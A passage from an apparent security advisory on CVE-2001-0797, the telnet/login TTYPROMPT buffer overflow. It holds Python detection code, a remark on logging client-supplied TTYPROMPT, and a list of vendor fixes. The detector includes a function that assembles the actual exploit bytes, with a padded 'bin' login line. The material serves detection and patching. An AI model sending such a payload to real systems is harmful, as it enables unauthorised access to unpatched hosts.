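    return (bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + name
            + bytes([ENV_VALUE]) + value + bytes([IAC, SE]))


def parse_new_environ(body: bytes) -> dict:
    """Decode the bytes between SB NEW-ENVIRON and IAC SE into {name: value}.
    Only IS/INFO (client -> server) blocks carry variables."""
    env = {}
    if not body or body[0] not in (ENV_IS, ENV_INFO):
        return env
    name, value, target = bytearray(), bytearray(), None
    i = 1
    while i < len(body):
        b = body[i]
        if b in (ENV_VAR, ENV_USERVAR):           # a new variable name starts
            if name:
                env[name.decode("latin-1")] = value.decode("latin-1")
            name, value, target = bytearray(), bytearray(), "name"
        elif b == ENV_VALUE:                      # its value follows
            target = "value"
        elif b == ENV_ESC and i + 1 < len(body):  # ESC quotes the next byte
            i += 1
            (name if target == "name" else value).append(body[i])
        elif target == "name":
            name.append(b)
        elif target == "value":
            value.append(b)
        i += 1
    if name:
        env[name.decode("latin-1")] = value.decode("latin-1")
    return env


def parse_telnet_stream(raw: bytes):
    """Walk a client -> server telnet stream; return (variables offered via
    NEW-ENVIRON, the plain data that reaches login's stdin)."""
    env, data, i = {}, bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if b != IAC:
            data.append(b)
            i += 1
            continue
        if i + 1 >= len(raw):
            break                                 # dangling IAC
        cmd = raw[i + 1]
        if cmd == IAC:                            # IAC IAC is a literal 0xff
            data.append(IAC)
            i += 2
        elif cmd == SB:                           # subnegotiation up to IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break                             # truncated subnegotiation
            if i + 2 < end and raw[i + 2] == NEW_ENVIRON:
                body = raw[i + 3:end].replace(b"\xff\xff", b"\xff")
                env.update(parse_new_environ(body))
            i = end + 2
        elif cmd in (WILL, WONT, DO, DONT):       # 3-byte option negotiation
            i += 3
        else:                                     # 2-byte commands (NOP, GA, ...)
            i += 2
    return env, bytes(data)


def login_args(data: bytes) -> list:
    """Tokens of the first line login reads. Assumption (consistent with the
    escaping in the dialup module): arguments split on spaces and tabs."""
    line = data.split(b"\n", 1)[0].rstrip(b"\r")
    return [t for t in re.split(rb"[ \t]+", line) if t]


def detect_cve_2001_0797(raw: bytes) -> dict:
    """Report both indicators: a client-supplied TTYPROMPT and an oversized
    argument list on the login line."""
    env, data = parse_telnet_stream(raw)
    args = login_args(data)
    return {"ttyprompt": env.get("TTYPROMPT"), "arg_count": len(args),
            "overflow": len(args) > MAX_LOGIN_ARGS}


def sample_telnet_exploit() -> bytes:
    """Constructed sample: the negotiation, TTYPROMPT block and login line the
    telnet module above sends (user 'bin', 65 fillers); values are made up."""
    nego = b"".join(bytes([IAC, c, o]) for c, o in
                    [(WONT, 0x18), (WONT, 0x1F), (WONT, 0x21), (WONT, 0x23),
                     (WILL, 0x22), (WONT, 0x24), (WILL, 0x27), (WILL, 0x00)])
    return (nego + new_environ_is(b"TTYPROMPT", b"abc123")
            + b"bin" + b" x" * 65 + b"\n\n\n")


if __name__ == "__main__":
    print(detect_cve_2001_0797(sample_telnet_exploit()))
    print(detect_cve_2001_0797(b"\xff\xfb\x18alice\r\n"))
    print(len(login_args(b"bin " + b"a " * 64 + b"\n")))   # dialup-style line
```

A TTYPROMPT offered by a telnet client is itself worth logging: no ordinary client sets it, and on the telnet path it is what makes login read the padded line. For the dialup path there is no telnet framing, so `login_args` runs directly on the captured line.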

- Solution

According to CERT, HP's response is that the telnet daemon shipped with HP-UX contains the buffer overflow but is not exploitable. Despite this, administrators are urged to apply the appropriate vendor fixes.

Fixes are available for the following products:

Cisco Billing and Management Server
Sun Solaris 8_sparc
Sun Solaris 2.6_x86
IBM AIX 5.1
Sun Solaris 7.0
Cisco Signaling Controller 2200
Sun Solaris 7.0_x86
Cisco PGW2200 PSTN Gateway
Sun Solaris 2.6
Sun Solaris 8_x86
Cisco Voice Services Provisioning Tool
Sun Solaris 2.5.1
Sun Solaris 2.5.1 _x86
Cisco Secure IDS Network Sensor 3.0 (2)S6
Cisco Secure IDS Network Sensor 3.0
IBM AIX 4.3
IBM AIX 4.3.1
IBM AIX 4.3.2
IBM AIX 4.3.3
SCO Open Server 5.0
SCO Open Server 5.0.1
SCO Open Server 5.0.2
SCO Open Server 5.0.3
SCO Open Server 5.0.4
SCO Open Server 5.0.5
SCO Open Server 5.0.6
SCO Open Server 5.0.6 a

- References